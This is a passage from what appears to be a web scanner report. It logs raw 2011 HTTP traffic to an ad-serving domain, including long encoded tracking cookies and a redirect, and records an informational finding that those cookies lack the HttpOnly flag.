ih="b!!!#<!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!+[=I!!!!#=)n6E!+[>D!!!!#=)n4%!,+Yc!!!!)=)n0b!,y[%!!!!(=)man!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=)mUu!.#:D!!!!#='htp!.XR3!!!!(=)m_O!.`.U!!!!#='htS!.g%4!!!!(=)o3I!.g%_!!!!%=)nrD!.g(s!!!!,=)o.b!.g(t!!!!%=)nv0!.g.)!!!!'=)md7!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/2Gk!!!!#=)nhw!/4Kq!!!!#=)nPm!/JVV!!!!'='jNd!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!/pW_!!!!$=)nJc!/peY!!!!#=)n-H!/pi4!!!!#=)nN$!/pid!!!!#=)nPE!/wxM!!!!$=)n(a!08vf!!!!$=)nFv!0Ehb!!!!#=)n,v!0Q8#!!!!#=)mx$!0Q[/!!!!#=)n?I!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0ucs!!!!$=)n>t!0v*F!!!!#=)nLX!0w#]!!!!#=)n@k!1#Gq!!!!$=)n+(!1#HS!!!!#=)n7A!1#HT!!!!#=)n7j!1-6r!!!!$=)nAe!1@m6!!!!$=%3V#!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1YRS!!!!$=)n'g!1Z@+!!!!#=)myI!1Z@/!!!!#=)n$<!1Z@0!!!!#=)n!o!1]f-!!!!>=)nf-!1_f$!!!!'=)n@C!1_f'!!!!)=)n=Q!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1kL!!!!!$=)n3*!1qGe!!!!#=%1p'!1sCA!!!!#=)nK_!1wmg!!!!#=)![j!2*$P!!!!#=)n)2!2*,b!!!!#=(h4W!2-Vw!!!!$=)nQ@!2.uG!!!!#=)mio!2.wX!!!!#=)n#k!21R/!!!!#=)n`u!23At!!!!#=)mda!23o_!!!!'=)m[2!294N!!!!(=)mhK!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2Cr6!!!!$=)naG!2KhY!!!!$=)ncg!2Khp!!!!#=)nbB!2L<B!!!!#=(1ID!2N5$!!!!5=)mxw!2NGs!!!!#=)n>K!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2Z9v!!!!$=)ne[!2`+,!!!!#='hw!!2g$h!!!!$=)nL.!2g$l!!!!$=)nRd!2g'^!!!!#=)ng*!2g>n!!!!$=)n,#!2gH2!!!!#='i#o!2jZq!!!!%=)n`L!2jZv!!!!$=)nVx!2j[4!!!!%=)nYA!2j[6!!!!$=)nU+!2j[@!!!!#=)n[a!2j[B!!!!#=)nUT!2jg(!!!!$=)n^V!2l9<!!!!$=)nIg!2l>@!!!!#=(aKS!2t,W!!!!$=)nF#!3!Yk!!!!$=)n*.!3$a2!!!!#=)5nT!3$vo!!!!#=)nc>!3$yw!!!!$=)n_Q!3'oN!!!!+=)nGr!3/P1!!!!#=)ndb!30M5!!!!#=)nNM!349Y!!!!#=)m[Z!34t)!!!!$=)nGH!35`n!!!!#=)nHC!36PE!!!!$=)n=x"; uid=uid=8a044d34-ad47-11e0-98d7-9bec9b275be2&_hmacv=1&_salt=1095483093&_keyid=k1&_hmac=e9bfd70fd4e5afb89d366b3b6b929ea9a1f33983; bh="b!!!%2!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0~~!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y~~!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 14:28:36 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%1!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; path=/; expires=Thu, 18-Jul-2013 14:28:36 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1034849195/?label=xRqLCMXtwQIQq5e67QM&amp;guid=ON&amp;script=0
Cache-Control: no-store
Last-Modified: Tue, 19 Jul 2011 14:28:36 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


14.22. http://ad.yieldmanager.com/unpixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /unpixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /unpixel?id=845380&id=1059013&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!V!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q!$,b_!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=*/YB!!!#G!#LI8!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#LI9!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!$2Fq!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#k92!,x.^!%)<k!/wxM!%>S,!A$74!!5/$*)6L=!w1K*!(#l)!%C9A!'By+~~~~~=)n(a=*.x[!!!#G!#uei!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<>!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<A!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!#w`V!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!#w`Y!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!$/E:!,x.^!%)<k!2g>n!%svw!D#5Q!!5/$*)6L=!w1K*!(#l)!%C9A!(0#g~~~~~=)n,#=*/#v!!!-V!#Np@!,x.^!%)<k!0Ehb!%H?v!Dng[!?5%!*)6L<!w1K*!(#l)!%C9A!'OU!~~~~~=)n,v=*!)H!!!#G!!4hJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*m6_!!!!a!#'jB!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jF!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jM!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#h@a!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!!L7_!,x.^!%)<k!,+Yc!#WUL!H<'!!!5/$*)6LA!w1K*!(#l)!%Oo9!$8eI~~~~~=)n0b=*lo#M.jTN!#v8S!,x.^!%)<k!1kL!!%e@!!JGK7!!5/$*)6L=!w1K*!(#l)!%C9A!'sVe~~~~~=)n3*=*/,$!!!#G!#ut0!,x.^!%)<k!1-6r!%W+=!Uu+O!!vZ,*ERU>!w1K*!(#l)!%C9A!'bnS~~~~~=)nAe=*/9`!!!#G!#q(2!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wjV!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)nl2!!!#G!#wjW!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)okp!!!#G!#wjX!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)q?u!!!#G!#wjY!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)t?(!!!#G!#wjZ!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*!==!!!#G!#wj[!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wj]!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*<57!!!#G!$1dF!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=*/]]!!!#G!#dUS!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!$,m-!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!#avR!,x.^!%)<k!/pW_!%M#r!#a.3!!5/$*ERU>!w1K*!(#l)!%C9A!'UVr~~~~~=)nJc=*!G4!!!#G!$0Tm!,x.^!%)<k!30M5!%vao!(-EV!?5%!*ERU=!w1K*!(#l)!%JKf!(3U?~~~~~=)nNM=.*8W!!.vL!$.w1!,x.^!%)<k!2jZq!%v%0!4)>p!!H<'*ERU?!w1K*!(#l)!%C9A!(2_Z~~~~~=)n`L=*/XG!!!#G!$,b^!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=)nl!!!.vL!$1dE!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=)no>!!.vL"; 